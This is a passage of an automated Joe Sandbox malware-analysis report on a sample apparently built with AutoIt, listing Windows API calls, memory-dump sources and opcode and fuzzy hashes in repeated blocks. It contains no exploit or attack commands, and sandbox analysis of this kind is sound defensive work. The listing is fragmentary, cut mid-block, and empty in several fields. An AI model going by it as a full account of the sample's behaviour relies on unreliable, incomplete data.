                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 3495660284-0
                                                                                        • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                        • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                                        • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                        • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                                        APIs
                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual
                                                                                        • String ID:
                                                                                        • API String ID: 4278518827-0
                                                                                        • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                        • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                                        • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                        • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                                        APIs
                                                                                        • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                        • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                        • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                        • ExitThread.KERNEL32 ref: 004151ED
                                                                                        • __freefls@4.LIBCMT ref: 00415209
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                        • String ID:
                                                                                        • API String ID: 442100245-0
                                                                                        • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                        • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                                        • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                        • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                                        APIs
                                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                        • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                                        • _wcslen.LIBCMT ref: 0045F94A
                                                                                        • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                        • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                                        • String ID: 0
                                                                                        • API String ID: 621800784-4108050209
                                                                                        • Opcode ID: 3fff2d21101a3002be7827e03843c7eb0ebd2a2980f4407c0443b1afb9236a38
                                                                                        • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                                        • Opcode Fuzzy Hash: 3fff2d21101a3002be7827e03843c7eb0ebd2a2980f4407c0443b1afb9236a38
                                                                                        • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                                        APIs
                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                        • SetErrorMode.KERNEL32 ref: 004781CE
                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                        • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                                        • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                                        • String ID: \VH
                                                                                        • API String ID: 3884216118-234962358
                                                                                        • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                        • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                                        • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                        • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                                        • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                                        • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                        • String ID: AU3_GetPluginDetails$Wu
                                                                                        • API String ID: 145871493-136108093
                                                                                        • Opcode ID: 370df5f0de2e0518f2a08b97302dffa77e8c256a3f35603dc40bd22eab7c0f05
                                                                                        • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                                        • Opcode Fuzzy Hash: 370df5f0de2e0518f2a08b97302dffa77e8c256a3f35603dc40bd22eab7c0f05
                                                                                        • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                                        APIs
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                                        • IsMenu.USER32(?), ref: 0044854D
                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                                        • DrawMenuBar.USER32 ref: 004485AF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$DrawInfoInsert
                                                                                        • String ID: 0
                                                                                        • API String ID: 3076010158-4108050209
                                                                                        • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                        • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                                        • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                        • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                                        APIs
                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                                        • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$_memmove_wcslen
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 1589278365-1403004172
                                                                                        • Opcode ID: 76e3401baae3ec8a9934b577b7d443cfc4906ac4f0cdecef2321dd9f3a6eafea
                                                                                        • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                                        • Opcode Fuzzy Hash: 76e3401baae3ec8a9934b577b7d443cfc4906ac4f0cdecef2321dd9f3a6eafea
                                                                                        • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Handle
                                                                                        • String ID: nul
                                                                                        • API String ID: 2519475695-2873401336
                                                                                        • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                        • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                                        • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                        • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Handle
                                                                                        • String ID: nul
                                                                                        • API String ID: 2519475695-2873401336
                                                                                        • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                        • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                                        • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                        • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: SysAnimate32
                                                                                        • API String ID: 0-1011021900
                                                                                        • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                        • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                                        • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                        • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                                        APIs
                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                          • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                          • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                          • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                          • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                        • GetFocus.USER32 ref: 0046157B
                                                                                          • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                                          • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                                        • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                                        • __swprintf.LIBCMT ref: 00461608
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                                        • String ID: %s%d
                                                                                        • API String ID: 2645982514-1110647743
                                                                                        • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                        • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                                        • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                        • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                        • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                                        • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                        • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                                        APIs
                                                                                        • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                        • String ID:
                                                                                        • API String ID: 3488606520-0
                                                                                        • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                        • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                                        • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                        • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                                        APIs
                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
